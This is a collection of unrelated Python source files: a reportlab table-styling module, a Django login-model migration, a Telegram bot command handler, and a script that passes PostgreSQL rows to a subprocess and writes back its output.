formatter,
cmap=None,
font_bw=1,
stripe_rows=1,
stripe_cols=0,
hdr_border_clazz=BorderTypeGrid,
cell_border_clazz=BorderTypeOutline,
border_weight=0.7,
):
"""
font_bw: bool, If True use black and white fonts. If False, then use the cmap
"""
cmap = cmap or Style.Blue
light = cmap.get("Light", white)
medium = cmap.get("Medium", gray)
dark = cmap.get("Dark", black)
# the ranges
header = formatter.all.iloc[: formatter.header.nrows]
cells = formatter.all.iloc[formatter.header.nrows :]
# color the header
hdr_border_clazz and header.set_border_type(
hdr_border_clazz, color=medium, weight=border_weight
)
header.set_textcolor(font_bw and white or light)
header.set_background(dark)
# color the cells
cell_border_clazz and cells.set_border_type(
cell_border_clazz, color=medium, weight=border_weight
)
stripe_rows and cells.set_row_backgrounds([light, white])
stripe_cols and cells.set_col_backgrounds([white, light])
not font_bw and cells.set_textcolor(dark)
class RegionFormatter(object):
def __init__(self, parent, row_ilocs, col_ilocs):
self.row_ilocs = row_ilocs
self.col_ilocs = col_ilocs
self.parent = parent
self.style_cmds = parent.style_cmds
self.is_contiguous_rows = isrcont = is_contiguous(row_ilocs)
self.is_contiguous_cols = isccont = is_contiguous(col_ilocs)
self.iloc = _RegionIX(self, "iloc")
# Build coord arrays for easy iteration
if isccont:
self.col_coord_tuples = [(col_ilocs.min(), col_ilocs.max())]
else:
self.col_coord_tuples = list(zip(col_ilocs, col_ilocs))
if isrcont:
self.row_coord_tuples = [(row_ilocs.min(), row_ilocs.max())]
else:
self.row_coord_tuples = list(zip(row_ilocs, row_ilocs))
@property
def nrows(self):
return len(self.row_ilocs)
@property
def ncols(self):
return len(self.col_ilocs)
@property
def last_row(self):
return self.empty_frame() if self.nrows == 0 else self.iloc[-1:, :]
@property
def last_col(self):
return self.empty_frame() if self.ncols == 0 else self.iloc[:, -1:]
def is_empty(self):
return self.nrows == 0 and self.ncols == 0
@property
def formatted_values(self):
return self.parent.formatted_values.iloc[self.row_ilocs, self.col_ilocs]
@property
def actual_values(self):
return self.parent.actual_values.iloc[self.row_ilocs, self.col_ilocs]
def new_instance(self, local_row_idxs, local_col_idxs):
rows = pd.Int64Index([self.row_ilocs[r] for r in local_row_idxs])
cols = pd.Int64Index([self.col_ilocs[c] for c in local_col_idxs])
return RegionFormatter(self.parent, rows, cols)
def empty_frame(self):
return self.new_instance([], [])
def match_column_labels(
self, match_value_or_fct, levels=None, max_matches=0, empty_res=1
):
"""Check the original DataFrame's column labels to find a subset of the current region
:param match_value_or_fct: value or function(hdr_value) which returns True for match
:param levels: [None, scalar, indexer]
:param max_matches: maximum number of columns to return
:return:
"""
allmatches = self.parent._find_column_label_positions(
match_value_or_fct, levels
)
# only keep matches which are within this region
matches = [m for m in allmatches if m in self.col_ilocs]
if max_matches and len(matches) > max_matches:
matches = matches[:max_matches]
if matches:
return RegionFormatter(self.parent, self.row_ilocs, pd.Int64Index(matches))
elif empty_res:
return self.empty_frame()
def match_row_labels(
self, match_value_or_fct, levels=None, max_matches=0, empty_res=1
):
"""Check the original DataFrame's row labels to find a subset of the current region
:param match_value_or_fct: value or function(hdr_value) which returns True for match
:param levels: [None, scalar, indexer]
:param max_matches: maximum number of columns to return
:return:
"""
allmatches = self.parent._find_row_label_positions(match_value_or_fct, levels)
# only keep matches which are within this region
matches = [m for m in allmatches if m in self.row_ilocs]
if max_matches and len(matches) > max_matches:
matches = matches[:max_matches]
if matches:
return RegionFormatter(self.parent, pd.Int64Index(matches), self.col_ilocs)
elif empty_res:
return self.empty_frame()
def match_any_labels(
self, match_value_or_fct, levels=None, max_matches=0, empty_res=1
):
res = self.match_column_labels(
match_value_or_fct, levels, max_matches, empty_res=0
)
res = res or self.match_row_labels(
match_value_or_fct, levels, max_matches, empty_res
)
return res
def iter_rows(self, start=None, end=None):
"""Iterate each of the Region rows in this region"""
start = start or 0
end = end or self.nrows
for i in range(start, end):
yield self.iloc[i, :]
def iter_cols(self, start=None, end=None):
"""Iterate each of the Region cols in this region"""
start = start or 0
end = end or self.ncols
for i in range(start, end):
yield self.iloc[:, i]
def __repr__(self):
return repr(self.formatted_values)
def apply_style(self, cmd, *args):
"""
Apply the specified style cmd to this region. For example, set all fonts to size 12, apply_style('FONTSIZE', 12)
:param cmd: reportlab format command
:param args: arguments for the cmd
:return: self
"""
for c0, c1 in self.col_coord_tuples:
for r0, r1 in self.row_coord_tuples:
c = [cmd, (c0, r0), (c1, r1)] + list(args)
self.style_cmds.append(c)
return self
def apply_styles(self, cmdmap):
"""
Apply the set of commands defined in cmdmap. for example, apply_styles({'FONTSIZE': 12, 'BACKGROUND': white})
:param cmdmap: dict of commands mapped to the command arguments
:return: self
"""
is_list_like = lambda arg: isinstance(arg, (list, tuple))
is_first_param_list = lambda c: c in ("COLBACKGROUNDS", "ROWBACKGROUNDS")
for cmd, args in cmdmap.items():
if not is_list_like(args):
args = [args]
elif (
is_first_param_list(cmd)
and is_list_like(args)
and not is_list_like(args[0])
):
args = [args]
self.apply_style(cmd, *args)
return self
def apply_conditional_styles(self, cbfct):
"""
Ability to provide dynamic styling of the cell based on its value.
:param cbfct: function(cell_value) should return a dict of format commands to apply to that cell
:return: self
"""
for ridx in range(self.nrows):
for cidx in range(self.ncols):
fmts = cbfct(self.actual_values.iloc[ridx, cidx])
fmts and self.iloc[ridx, cidx].apply_styles(fmts)
return self
def detect_colspans(self, use_actual=1):
"""Determine if any col spans are present in the values.
:param use_actual: if True, check actual_values for span. if False, use the formatted_values
:return: self
"""
vals = self.actual_values if use_actual else self.formatted_values
if self.is_contiguous_cols:
for ridx in range(self.nrows):
for c0, c1 in span_iter(vals.iloc[ridx, :]):
actual_idx = self.row_ilocs[ridx]
self.style_cmds.append(["SPAN", (c0, actual_idx), (c1, actual_idx)])
return self
def detect_rowspans(self, use_actual=1):
"""Determine if any row spans are present in the values.
:param use_actual: if True, check actual_values for span. if False, use the formatted_values
:return: self
"""
""" Determine if any row spans are present"""
vals = self.actual_values if use_actual else self.formatted_values
if self.is_contiguous_rows:
for cidx in range(self.ncols):
for r0, r1 in span_iter(vals.iloc[:, cidx]):
actual_idx = self.col_ilocs[cidx]
self.style_cmds.append(["SPAN", (actual_idx, r0), (actual_idx, r1)])
return self
def detect_spans(self, colspans=1, rowspans=1, use_actual=1):
colspans and self.detect_colspans(use_actual)
rowspans and self.detect_rowspans(use_actual)
def apply_format(self, fmtfct):
"""
For each cell in the region, invoke fmtfct(cell_value) and store result in the formatted_values
:param fmtfct: function(cell_value) which should return a formatted value for display
:return: self
"""
for ridx in range(self.nrows):
for cidx in range(self.ncols):
# MUST set the parent as local view is immutable
riloc = self.row_ilocs[ridx]
ciloc = self.col_ilocs[cidx]
self.parent.formatted_values.iloc[riloc, ciloc] = fmtfct(
self.actual_values.iloc[ridx, cidx]
)
return self
def apply_rowattrs(self, **kwargs):
for k, v in kwargs.items():
self.parent.rowattrs.iloc[self.row_ilocs, k] = v
return self
def apply_colattrs(self, **kwargs):
for k, v in kwargs.items():
self.parent.colattrs.loc[self.col_ilocs, k] = v
return self
def apply(self, **kwargs):
"""
Accepts the following keys:
'styles': see apply_styles for args
'cstyles': see apply_condition_styles for args
'format': see apply_format for args
'c': col width (array or scalar)
'cmin': min col width (array or scalar)
'cmax': max col width (array or scalar)
'cweight: col weight use at runtime to determine width
'r': row height (array or scalar)
'rmin': min row height (array or scalar)
'rmax': max row height (array or scalar)
'rweight: row weight use at runtime to determine height
'cspans': detect colspans
'rspans': detect rowspans
'spans': bool, detetch both rowspans and colspans
@param kwargs:
@return:
"""
def _apply_if_avail(key, fct):
if key in kwargs:
val = kwargs.pop(key)
if val is not None:
fct(val)
_apply_if_avail("styles", lambda v: self.apply_styles(v))
_apply_if_avail("cstyles", lambda v: self.apply_conditional_styles(v))
_apply_if_avail("format", lambda v: self.apply_format(v))
_apply_if_avail("c", lambda v: self.apply_colattrs(value=v))
_apply_if_avail("cmin", lambda v: self.apply_colattrs(min=v))
_apply_if_avail("cmax", lambda v: self.apply_colattrs(max=v))
_apply_if_avail("cweight", lambda v: self.apply_colattrs(weight=v))
_apply_if_avail("r", lambda v: self.apply_rowattrs(value=v))
_apply_if_avail("rmin", lambda v: self.apply_rowattrs(min=v))
_apply_if_avail("rmax", lambda v: self.apply_rowattrs(max=v))
_apply_if_avail("rweight", lambda v: self.apply_rowattrs(weight=v))
_apply_if_avail("rspans", lambda v: v and self.detect_rowspans())
_apply_if_avail("cspans", lambda v: v and self.detect_colspans())
_apply_if_avail(
"spans", lambda v: v and (self.detect_rowspans(), self.detect_colspans())
)
def apply_number_format(self, formatter, rb=1, align=1):
styles = align and AlignRight or {}
cstyles = rb and ConditionalRedBlack or None
self.apply(format=formatter, styles=styles, cstyles=cstyles)
return self
def _do_number_format(self, rb, align, fmt_fct, fmt_args, defaults):
args = {}
defaults and args.update(defaults)
fmt_args and args.update(fmt_args)
f = pad_positive_wrapper(fmt_fct(**args))
return self.apply_number_format(f, rb=rb, align=align)
def percent_format(self, rb=1, align=1, **fmt_args):
defaults = {"precision": 2, "nan": "-"}
return self._do_number_format(
rb, align, fmt.new_percent_formatter, fmt_args, defaults
)
def int_format(self, rb=1, align=1, **fmt_args):
defaults = {"nan": "-"}
return self._do_number_format(
rb, align, fmt.new_int_formatter, fmt_args, defaults
)
def float_format(self, rb=1, align=1, **fmt_args):
defaults = {"precision": 2, "nan": "-"}
return self._do_number_format(
rb, align, fmt.new_float_formatter, fmt_args, defaults
)
def thousands_format(self, rb=1, align=1, **fmt_args):
defaults = {"precision": 1, "nan": "-"}
return self._do_number_format(
rb, align, fmt.new_thousands_formatter, fmt_args, defaults
)
def millions_format(self, rb=1, align=1, **fmt_args):
defaults = {"precision": 1, "nan": "-"}
return self._do_number_format(
rb, align, fmt.new_millions_formatter, fmt_args, defaults
)
def billions_format(self, rb=1, align=1, **fmt_args):
defaults = {"precision": 1, "nan": "-"}
return self._do_number_format(
rb, align, fmt.new_billions_formatter, fmt_args, defaults
)
def guess_number_format(self, rb=1, align=1, **fmt_args):
"""Determine the most appropriate formatter by inspected all the region values"""
fct = fmt.guess_formatter(self.actual_values, **fmt_args)
return self.apply_number_format(fct, rb=rb, align=align)
def guess_format(self, rb=1, align=1, **fmt_args):
from tia.util.fmt import NumberFormat
fct = fmt.guess_formatter(self.actual_values, **fmt_args)
if isinstance(fmt, NumberFormat):
return self.apply_number_format(fct, rb=rb, align=align)
else:
return self.apply_format(fct)
def dynamic_number_format(self, rb=1, align=1, **fmt_args):
"""Formatter changes based on the cell value"""
fct = fmt.DynamicNumberFormatter(**fmt_args)
return self.apply_number_format(fct, rb=rb, align=align)
# def heat_map(self, cmap=None, min=None, max=None, font_cmap=None):
def heat_map(self, cmap="RdYlGn", vmin=None, vmax=None, font_cmap=None):
if cmap is None:
carr = ["#d7191c", "#fdae61", "#ffffff", "#a6d96a", "#1a9641"]
cmap = LinearSegmentedColormap.from_list("default-heatmap", carr)
if isinstance(cmap, str):
cmap = get_cmap(cmap)
if isinstance(font_cmap, str):
font_cmap = get_cmap(font_cmap)
vals = self.actual_values.astype(float)
if vmin is None:
vmin = vals.min().min()
if vmax is None:
vmax = vals.max().max()
norm = (vals - vmin) / (vmax - vmin)
for ridx in range(self.nrows):
for cidx in range(self.ncols):
v = norm.iloc[ridx, cidx]
if np.isnan(v):
continue
color = cmap(v)
hex = rgb2hex(color)
styles = {"BACKGROUND": HexColor(hex)}
if font_cmap is not None:
styles["TEXTCOLOR"] = HexColor(rgb2hex(font_cmap(v)))
self.iloc[ridx, cidx].apply_styles(styles)
return self
heatmap = heat_map
def set_font(self, name=None, size=None, leading=None, color=None):
name and self.set_fontname(name)
size and self.set_fontsize(size)
leading and self.set_leading(leading)
color and self.set_textcolor(color)
return self
def set_fontname(self, name):
return self.apply_style("FONTNAME", name)
def set_fontsize(self, size):
return self.apply_style("FONTSIZE", size)
def set_textcolor(self, color):
return self.apply_style("TEXTCOLOR", color)
def set_leading(self, n):
return self.apply_style("LEADING", n)
def set_valign(self, pos):
return self.apply_style("VALIGN", pos)
def set_valign_middle(self):
return self.set_valign("MIDDLE")
def set_valign_center(self):
return self.set_valign_middle()
def set_valign_top(self):
return self.set_valign("TOP")
def set_valign_bottom(self):
return self.set_valign("BOTTOM")
def set_align(self, pos):
return self.apply_style("ALIGN", pos)
def set_align_center(self):
return self.set_align("CENTER")
def set_align_middle(self):
return self.set_align_center()
def set_align_left(self):
return self.set_align("LEFT")
def set_align_right(self):
return self.set_align("RIGHT")
def set_pad(self, left, bottom, right, top):
return self.set_lpad(left).set_bpad(bottom).set_rpad(right).set_tpad(top)
def set_lpad(self, n):
return self.apply_style("LEFTPADDING", n)
def set_bpad(self, n):
return self.apply_style("BOTTOMPADDING", n)
def set_rpad(self, n):
return self.apply_style("RIGHTPADDING", n)
def set_tpad(self, n):
return self.apply_style("TOPPADDING", n)
def set_box(
self,
weight=DefaultWeight,
color=None,
cap=None,
dashes=None,
join=None,
count=None,
space=None,
):
return self.apply_style("BOX", weight, color, cap, dashes, join, count, space)
def set_grid(
self,
weight=DefaultWeight,
color=None,
cap=None,
dashes=None,
join=None,
count=None,
space=None,
):
return self.apply_style("GRID", weight, color, cap, dashes, join, count, space)
def set_lineabove(
self,
weight=DefaultWeight,
color=None,
cap=None,
dashes=None,
join=None,
count=None,
space=None,
):
return self.apply_style(
"LINEABOVE", weight, color, cap, dashes, join, count, space
)
def set_linebelow(
self,
weight=DefaultWeight,
color=None,
cap=None,
dashes=None,
join=None,
count=None,
space=None,
):
return self.apply_style(
"LINEBELOW", weight, color, cap, dashes, join, count, space
)
def set_linebefore(
self,
weight=DefaultWeight,
color=None,
cap=None,
dashes=None,
join=None,
count=None,
space=None,
):
return self.apply_style(
"LINEBEFORE", weight, color, cap, dashes, join, count, space
)
def set_lineafter(
self,
weight=DefaultWeight,
color=None,
cap=None,
dashes=None,
join=None,
count=None,
space=None,
):
return self.apply_style(
"LINEAFTER", weight, color, cap, dashes, join, count, space
)
def set_border_type(
self,
clazz,
weight=DefaultWeight,
color=None,
cap=None,
dashes=None,
join=None,
count=None,
space=None,
):
"""example: set_border_type(BorderTypePartialRows) would set a border above and below each row in the range"""
args = locals()
args.pop("clazz")
args.pop("self")
clazz(**args).apply(self)
def set_background(self, color):
return self.apply_style("BACKGROUND", color)
def set_col_backgrounds(self, colors):
"""Set alternative column colors"""
return self.apply_style("COLBACKGROUNDS", colors)
def set_row_backgrounds(self, colors):
"""Set alternative row colors"""
return self.apply_style("ROWBACKGROUNDS", colors)
class _RegionIX(object):
""" Custom version of indexer which ensures a DataFrame is created for proper use with the RangeFormatter"""
def __init__(self, region, idx_fct_name="iloc"):
self.region = region
self.idx_fct_name = idx_fct_name
def __getitem__(self, key):
"""Sloppy implementation as I do not handle nested tuples properly"""
if isinstance(key, tuple):
if len(key) != 2:
raise Exception("if tuple is used, it must contain 2 indexers")
ridx = key[0]
cidx = key[1]
else:
ridx = key
cidx = slice(None)
region = self.region
# bug when ridx is -1 and only a single row - cannot get DataFrame
if np.isscalar(ridx) and ridx == -1 and len(region.formatted_values.index) == 1:
ridx = [0]
else:
ridx = [ridx] if np.isscalar(ridx) else ridx
cidx = [cidx] if np.isscalar(cidx) else cidx
idx = getattr(region.formatted_values, self.idx_fct_name)
result = idx[ridx, cidx]
if not isinstance(result, pd.DataFrame):
raise Exception(
"index %s is expected to return a DataFrame, not %s"
% (key, type(result))
)
return RegionFormatter(self.region.parent, result.index, result.columns)
class TableFormatter(object):
def __init__(self, df, inc_header=1, inc_index=1):
self.df = df
self.inc_header = inc_header
self.inc_index = inc_index
self.ncols = ncols = len(df.columns)
self.nrows = nrows = len(df.index)
self.nhdrs = nhdrs = inc_header and df.columns.nlevels or 0
self.nidxs = nidxs = inc_index and df.index.nlevels or 0
self.style_cmds = []
# copy the actual values to the formatted cells
values = (
df.reset_index(drop=not inc_index)
.T.reset_index(drop=not inc_header)
.T.reset_index(drop=True)
)
if inc_index and nhdrs > 1: # move index name down
values.iloc[nhdrs - 1, :nidxs] = values.iloc[0, :nidxs]
values.iloc[: nhdrs - 1, :nidxs] = ""
formatted_values = pd.DataFrame(
np.empty((nhdrs + nrows, nidxs + ncols), dtype=object)
)
formatted_values.ix[:, :] = values.copy().values
self.actual_values = values
self.formatted_values = formatted_values
self.named_regions = {
"ALL": RegionFormatter(
self, formatted_values.index, formatted_values.columns
),
"HEADER": RegionFormatter(
self, formatted_values.index[:nhdrs], formatted_values.columns[nidxs:]
),
"INDEX": RegionFormatter(
self, formatted_values.index[nhdrs:], formatted_values.columns[:nidxs]
),
"CELLS": RegionFormatter(
self, formatted_values.index[nhdrs:], formatted_values.columns[nidxs:]
),
"INDEX_HEADER": RegionFormatter(
self, formatted_values.index[:nhdrs], formatted_values.columns[:nidxs]
),
}
# Define some fields to handle weight of rows/columns
self.rowattrs = pd.DataFrame(
np.empty((nhdrs + nrows, 4)), columns=["weight", "min", "max", "value"]
)
self.rowattrs[:] = np.nan
self.colattrs = pd.DataFrame(
np.empty((nidxs + ncols, 4)), columns=["weight", "min", "max", "value"]
)
self.colattrs[:] = np.nan
def __getitem__(self, name):
return self.named_regions[name]
def get_default_header_style(self, **overrides):
return dict(DefaultHeaderStyle, **overrides)
def apply_default_cell_style(self, **overrides):
styles = dict(DefaultCellStyle, **overrides)
self.cells.apply_styles(styles)
return self
def apply_default_header_style(self, inc_index=0, **overrides):
styles = self.get_default_header_style(**overrides)
self.header.apply_styles(styles)
if inc_index:
self.index_header.apply_styles(styles)
return self
def apply_default_index_style(self, **overrides):
styles = dict(DefaultIndexStyle, **overrides)
self.index.apply_styles(styles)
return self
def apply_default_style(
self,
inc_cells=1,
inc_header=1,
inc_index=1,
inc_index_header=0,
cells_override=None,
header_override=None,
index_override=None,
):
inc_cells and self.apply_default_cell_style(**(cells_override or {}))
inc_header and self.apply_default_header_style(
inc_index=inc_index_header, **(header_override or {})
)
inc_index and self.apply_default_index_style(**(index_override or {}))
return self
def apply_basic_style(
self,
font="Helvetica",
font_bold="Helvetica-Bold",
font_size=8,
rpad=None,
lpad=None,
bpad=None,
tpad=None,
colspans=1,
rowspans=0,
cmap=None,
font_bw=1,
stripe_rows=1,
stripe_cols=0,
hdr_border_clazz=BorderTypeGrid,
cell_border_clazz=BorderTypeOutline,
border_weight=0.7,
):
Style.apply_basic(
self,
font=font,
font_bold=font_bold,
font_size=font_size,
rpad=rpad,
lpad=lpad,
bpad=bpad,
tpad=tpad,
colspans=colspans,
rowspans=rowspans,
)
Style.apply_color(
self,
cmap,
font_bw=font_bw,
stripe_cols=stripe_cols,
stripe_rows=stripe_rows,
hdr_border_clazz=hdr_border_clazz,
cell_border_clazz=cell_border_clazz,
border_weight=border_weight,
)
return self
@property
def all(self):
return self["ALL"]
@property
def header(self):
return self["HEADER"]
@property
def index(self):
return self["INDEX"]
@property
def index_header(self):
return self["INDEX_HEADER"]
@property
def cells(self):
return self["CELLS"]
def set_row_heights(self, pcts=None, amts=None, maxs=None, mins=None):
"""
:param pcts: the percent of available height to use or ratio is also ok
:param amts: (Array or scalar) the fixed height of the rows
:param maxs: (Array or scalar) the maximum height of the rows (only use when pcts is used)
:param mins: (Array or scalar) the minimum height of the rows (only used when pcts is used)
:return:
"""
for arr, attr in zip(
[pcts, amts, maxs, mins], ["weight", "value", "max", "min"]
):
if arr is not None:
if not np.isscalar(arr):
if len(arr) != len(self.formatted_values.index):
raise ValueError(
"%s: expected %s rows but got %s"
% (attr, len(arr), len(self.formatted_values.index))
)
self.rowattrs.ix[:, attr] = arr
return self
def set_col_widths(self, pcts=None, amts=None, maxs=None, mins=None):
"""
:param pcts: the percent of available width to use or ratio is also ok
:param amts: (Array or scalar) the fixed width of the cols
:param maxs: (Array or scalar) the maximum width of the cols (only use when pcts is used)
:param mins: (Array or scalar) the minimum width of the cols (only used when pcts is used)
:return:
"""
for arr, attr in zip(
[pcts, amts, maxs, mins], ["weight", "value", "max", "min"]
):
if arr is not None:
if not np.isscalar(arr):
if len(arr) != len(self.formatted_values.columns):
raise ValueError(
"%s: expected %s cols but got %s"
% (attr, len(arr), len(self.formatted_values.columns))
)
self.colattrs.ix[:, attr] = arr
return self
def _resolve_dims(self, available, attrs):
def _clean(v):
return None if np.isnan(v) else v
if attrs["value"].notnull().any(): # Static values
# Assume that if one is set than all are set
return [_clean(a) for a in attrs["value"]]
elif attrs["weight"].notnull().any():
# Dynamic values
f = attrs
f["active"] = (attrs["weight"] * available) / attrs["weight"].sum()
f["active"] = f[["active", "min"]].max(axis=1)
f["active"] = f[["active", "max"]].min(axis=1)
return list(f.active.fillna(0))
elif attrs["min"].notnull().any():
return [_clean(a) for a in attrs["min"]]
else:
return None
def resolve_col_widths(self, availWidth):
return self._resolve_dims(availWidth, self.colattrs)
def resolve_row_heights(self, availHeight):
return self._resolve_dims(availHeight, self.rowattrs)
def build(self, expand="wh", shrink="wh", vAlign="MIDDLE", hAlign="CENTER"):
return TableLayout(self, expand, shrink, hAlign, vAlign)
def _find_column_label_positions(self, match_value_or_fct, levels=None):
"""Check the original DataFrame's column labels to find the locations of columns. And return the adjusted
column indexing within region (offset if including index)"""
allmatches = find_locations(self.df.columns, match_value_or_fct, levels)
if allmatches and self.inc_index: # tramslate back
allmatches = [m + self.nidxs for m in allmatches]
return allmatches
def _find_row_label_positions(self, match_value_or_fct, levels=None):
"""Check the original DataFrame's row labels to find the locations of rows. And return the adjusted
row indexing within region (offset if including index)"""
allmatches = find_locations(self.df.index, match_value_or_fct, levels)
if allmatches and self.inc_index: # tramslate back
allmatches = [m + self.nhdrs for m in allmatches]
return allmatches
class TableLayout(Flowable):
def __init__(self, tb, expand="wh", shrink="wh", hAlign="CENTER", vAlign="MIDDLE"):
self.tb = tb
self.expand = expand or ""
self.shrink = shrink or ""
self.vAlign = vAlign
self.hAlign = hAlign
self._style_and_data = None
self.component = None
@property
def style_and_data(self):
if self._style_and_data is None:
data = self.tb.formatted_values.values.tolist()
style = TableStyle(self.tb.style_cmds)
self._style_and_data = style, data
return self._style_and_data
def wrap(self, aw, ah):
style, data = self.style_and_data
# Apply any column / row sizes requested
widths = self.tb.resolve_col_widths(aw)
heights = self.tb.resolve_row_heights(ah)
tbl = Table(
data,
colWidths=widths,
rowHeights=heights,
style=style,
vAlign=self.vAlign,
hAlign=self.hAlign,
repeatCols=False,
repeatRows=True,
)
w, h = tbl.wrap(aw, ah)
pw, ph = w / float(aw), h / float(ah)
shrink, expand = self.shrink, self.expand
scale = 0
if expand and pw < 1.0 and ph < 1.0:
scale = max("w" in expand and pw or 0, "h" in expand and ph or 0)
elif shrink and (pw > 1.0 or ph > 1.0):
scale = max("w" in shrink and pw or 0, "h" in expand and ph or 0)
if scale:
self.component = comp = KeepInFrame(
aw, ah, content=[tbl], hAlign=self.hAlign, vAlign=self.vAlign
)
w, h = comp.wrapOn(self.canv, aw, ah)
comp._scale = scale
else:
self.component = tbl
return w, h
def drawOn(self, canvas, x, y, _sW=0):
return self.component.drawOn(canvas, x, y, _sW=_sW)
def split(self, aw, ah):
if self.component:
return self.component.split(aw, ah)
else:
return []
|
py | b4112995ed34faa28e1c4aba0c13d1666c0a2234 | # Generated by Django 4.0.1 on 2022-02-07 12:10
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('user', '0003_initial'),
]
operations = [
migrations.CreateModel(
name='LoginModel',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('username', models.CharField(max_length=50, verbose_name='Username')),
('password', models.CharField(max_length=50, verbose_name='Password')),
],
),
]
|
py | b411299bd2861845cbf7bad0ec494450a179cc9d | import multiprocessing
import time
import random
from modules import (
throw_dice, check_holiday, days_until_summer, days_until_newyear,
show_color_rgb, get_coordinates, usual_lootbox, weapon_lootbox
)
from telegram_bot import Bot
from jsondb import JsonDB
def message_handler(incoming_message):
global shadow_db
# default / and ? commands from commands.json
commands = JsonDB("commands.json")["commands"]
# quotes for bot's random quote feature
quotes = JsonDB("data/quotes.json")["quotes"]
result = {
"method": "send_message",
"chat_id": incoming_message["chat_id"],
"text": "?"
}
for command_name in commands.keys():
if incoming_message["text"] == command_name:
result["text"] = commands[command_name]
# random quote feature
if incoming_message["text"] == "/quote":
result["text"] = random.choice(quotes)
# lootboxes feature
if incoming_message["text"] == "/lootbox":
result["text"] = usual_lootbox()
if incoming_message["text"] == "/weapon_lootbox":
result["text"] = weapon_lootbox()
# throwing dice feature
if incoming_message["text"].startswith("/dice"):
result["text"] = throw_dice(incoming_message["text"])
# random choice feature
if incoming_message["text"].startswith("/random"):
try:
random_result = random.choice(incoming_message["text"].split(" ")[1:])
except:
random_result = "Type command correctly"
finally:
result["text"] = random_result
# days until newyear or summer feature
if incoming_message["text"] == "/newyear":
result["text"] = days_until_newyear()
if incoming_message["text"] == "/summer":
result["text"] = days_until_summer()
# locations feature
if incoming_message["text"].startswith("/where"):
try:
location = incoming_message["text"].split(" ")[1]
result = {
"method": "send_location",
"coordinates": get_coordinates(location),
"chat_id": incoming_message["chat_id"]
}
except:
result = {
"method": "send_message",
"chat_id": incoming_message["chat_id"],
"text": "Type command correctly"
}
if incoming_message["text"].startswith("/location") and incoming_message["text"] != "/locations":
try:
location = incoming_message["text"].split(" ")[1:]
result = {
"method": "send_location",
"coordinates": {"latitude": float(location[0]), "longitude": float(location[1])},
"chat_id": incoming_message["chat_id"]
}
except:
result = {
"method": "send_message",
"chat_id": incoming_message["chat_id"],
"text": "Type command correctly"
}
# chat id getter
if incoming_message["text"] == "/chat_id":
result["text"] = incoming_message["chat_id"]
# unix time feature
if incoming_message["text"] == "/unix_time":
result["text"] = "{} seconds since 00:00:00 1 January 1970".format(str(round(time.time())))
# holiday feature
if incoming_message["text"] == "/holiday":
result["text"] = check_holiday()
# rgb feature
if incoming_message["text"].startswith("/rgb"):
try:
rgb = [int(color) for color in incoming_message["text"].split(" ")[1:]]
rgb = tuple(rgb)
if len(rgb) != 3:
raise ValueError
except:
rgb = (255, 255, 255)
finally:
result = {
"method": "send_photo",
"photo": open(show_color_rgb(rgb), "rb"),
"caption": "Red - {}, Green - {}, Blue - {}".format(rgb[0], rgb[1], rgb[2]),
"chat_id": incoming_message["chat_id"]
}
# drop log file feature
if incoming_message["text"] == "/droplog":
result = {
"method": "send_document",
"caption": "Log",
"chat_id": incoming_message["chat_id"]
}
if "text" in result.keys():
if result["text"] == "?":
result = None
return result
def bot_processor(delay):
global lock, db
bot = Bot(db["token"], admin_id=db["admin_id"])
while True:
lock.acquire()
messages = bot.get_last_messages()
for message in messages:
if round(time.time()) - message["date"] <= db["max_time_diff"]:
try:
incoming_message = {"text": message["text"], "chat_id": message["chat"]["id"]}
# some messages have not text (stickers, files etc)
except:
continue
outgoing_message = message_handler(incoming_message)
if outgoing_message is None:
continue
elif outgoing_message["method"] == "send_message":
bot.send_message(outgoing_message["chat_id"], outgoing_message["text"])
elif outgoing_message["method"] == "send_location":
bot.send_location(outgoing_message["chat_id"], outgoing_message["coordinates"])
elif outgoing_message["method"] == "send_photo":
bot.send_file(outgoing_message["chat_id"],
outgoing_message["photo"],
"photo",
outgoing_message["caption"])
elif outgoing_message["method"] == "send_audio":
bot.send_file(outgoing_message["chat_id"], outgoing_message["audio"], "audio")
elif outgoing_message["method"] == "send_document":
if outgoing_message["caption"].startswith("Log"):
if outgoing_message["chat_id"] == bot.admin_id:
bot.send_file(bot.admin_id,
open(bot.log_file, "rb"),
"document",
outgoing_message["caption"])
else:
bot.send_message(bot.admin_id, "Unresolved attempt to access to log file from {}".format(
outgoing_message["chat_id"]))
else:
pass
db["last_checked_update_id"] = bot.last_checked_update_id
db.write()
lock.release()
time.sleep(delay)
if __name__ == '__main__':
db = JsonDB("db.json")
lock = multiprocessing.Lock()
manager = multiprocessing.Manager()
shadow_db = manager.dict()
bot_process = multiprocessing.Process(target=bot_processor, args=(db["delays"]["bot"],))
bot_process.start()
bot_process.join()
|
py | b4112a059f046a6fce87fa439b64451b87755d40 | import sys
import subprocess
import json
import psycopg2.extras
from common import conn, command, aggregate, get_aggregate
def handler(obj):
if hasattr(obj, 'isoformat'):
return obj.isoformat()
else:
raise TypeError('Object of type %s with value of %s is not JSON serializable' % (type(obj), repr(obj)))
cur = conn.cursor(cursor_factory=psycopg2.extras.RealDictCursor)
def prepare(table, check_column):
cur.execute("SELECT column_name FROM information_schema.columns WHERE table_name=%s and column_name=%s", (table, check_column))
if not cur.fetchone():
cur.execute("alter table %s add column %s boolean" % (table, check_column))
conn.commit()
def run(table, check_column, update_column, id_column, app):
p = subprocess.Popen([ app ], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
while True:
cur.execute("select * from %s where %s is distinct from 't' for update skip locked limit 1" % (table, check_column))
r = cur.fetchone()
if not r:
break
print("Processing row %s..." % r[id_column], end="")
sys.stdout.flush()
p.stdin.write((json.dumps(r, default=handler)+"\n").encode())
p.stdin.flush()
res = p.stdout.readline()
try:
res = json.loads(res)
except:
print(" Fail.")
print(res)
raise
if not update_column in res or not id_column in res:
print(" Fail.")
print(res)
raise Exception("Missing %s key, broken app!" % (update_column, id_column))
cur.execute("update %s set %s = 't', %s = %s where %s = %s" % (table, check_column, update_column, '%s', id_column, '%s'), (res[update_column], res[id_column]))
print(" Done.")
conn.commit()
if __name__ == "__main__":
if len(sys.argv) < 6:
print("Provide table, check_column, update_column, id_column and app!")
sys.exit(2)
print("Prepare start")
prepare(sys.argv[1], sys.argv[2])
print("RUN")
run(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4], sys.argv[5])
|
py | b4112a33b7c72f91064054135362a5f77e46ebb6 | # -*- coding: utf-8 -*-
